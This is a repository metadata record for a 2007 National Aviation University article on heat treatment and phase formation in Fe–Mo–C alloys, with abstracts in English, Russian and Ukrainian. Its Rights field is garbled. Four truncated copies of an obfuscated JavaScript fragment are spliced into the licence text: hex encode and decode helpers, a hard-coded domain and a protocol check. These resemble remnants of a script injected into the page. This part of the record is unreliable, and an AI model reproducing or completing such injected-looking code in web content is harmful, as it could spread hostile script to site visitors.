Record Details

Effect of heat treatment on phase composition and microstructure of samples of fe-mo-c

Наукові журнали Національного Авіаційного Університету

View Archive Info
 
 
Field Value
 
Title Effect of heat treatment on phase composition and microstructure of samples of fe-mo-c
Влияние термической обработки на фазовый состав и микроструктура образцов системы fe-mo-c
ВПЛИВ ТЕРМІЧНОЇ ОБРОБКИ НА ФАЗОВИЙ СКЛАД І МІКРОСТРУКТУРУ ЗРАЗКІВ СИСТЕМИ FE–MO–C
 
Creator Заславський, О.М.; НАУ, кафедра хімії і хімічної технології
Веліканова, Т.А.; Інститут проблем матеріалознавства ім. І. М. Францевича НАН України
 
Subject


 
Description The Fe–Mo–C ternary alloys have been heat-treated by Pirani-Alterthum method. The heat-treatment influence on the changing of phase composition and microstructure of this alloys has been examined by means X-Ray and metallography methods. It was determined that heat-treatment not results in formation of Mn-like π and χ phases in the subsolidus area of the Fe-Mo-C ternary system. Assumption has been put forward that formation of this phases occurs on nonsolid-phase mechanism.
 Образцы тройной системы Fe-Mo-C были подвергнуты термическому воздействию методом Пирани-Альтертума. Рен-тгенографично и металлографические исследовано влияние термообработки на изменение фазового состава и микростру-ктуры образцов. Установлено, что термическое воздействие не приводит к образованию π и χ фаз в субсолидусний время-тини диаграммы состояния системы Fe-Mo-C. Выдвинуто предположение, что образование этих фаз в системе происходит-ется за механизмами, отличными от твердофазных.
 Зразки потрійної системи Fe−Mo−C були піддані термічному впливу за методом Пірані-Альтертума. Рентгенографічно та металографічно досліджено вплив термообробки на зміну фазового складу і мікроструктури зразків. Установлено, що термічний вплив не приводить до утворення π та χ фаз у субсолідусній частині діаграми стану системи Fe−Mo−C. Висунуто припущення, що утворення цих фаз у системі відбувається за механізмами, відмінними від твердофазних.
 
Publisher National Aviation University
 
Contributor


 
Date 2007-01-01
 
Type


 
Format application/pdf
 
Identifier http://jrnl.nau.edu.ua/index.php/visnik/article/view/1458
10.18372/2306-1472.31.1458
 
Source Proceedings of the National Aviation University; Том 31, № 1 (2007); 159-162
Вестник Национального авиационного университета; Том 31, № 1 (2007); 159-162
Вісник Національного Авіаційного Університету; Том 31, № 1 (2007); 159-162
 
Language uk
 
Rights // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
Автори, які публікуються у цьому журналі, погоджуються з такими умовами:Автори залишають за собою право на авторство своєї роботи та передають журналу право першої публікації цієї роботи на умовах ліцензії Creative Commons Attribution License, котра дозволяє іншим особам вільно розповсюджувати опубліковану роботу з обов'язковим посиланням на авторів оригінальної роботи та першу публікацію роботи у цьому журналі.Автори мають право укладати самостійні додаткові угоди щодо неексклюзивного розповсюдження роботи у тому вигляді, в якому вона була опублікована цим журналом (наприклад, розміщувати роботу в електронному сховищі установи або публікувати у складі монографії), за умови збереження посилання на першу публікацію роботи у цьому журналі.Політика журналу дозволяє і заохочує розміщення авторами в мережі Інтернет (наприклад, у сховищах установ або на особистих веб-сайтах) рукопису роботи, як до подання цього рукопису до редакції, так і під час його редакційного опрацювання, оскільки це сприяє виникненню продуктивної наукової дискусії та позитивно позначається на оперативності та динаміці цитування опублікованої роботи (див. The Effect of Open Access).// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
 

Технічна підтримка: НДІІТТ НАУ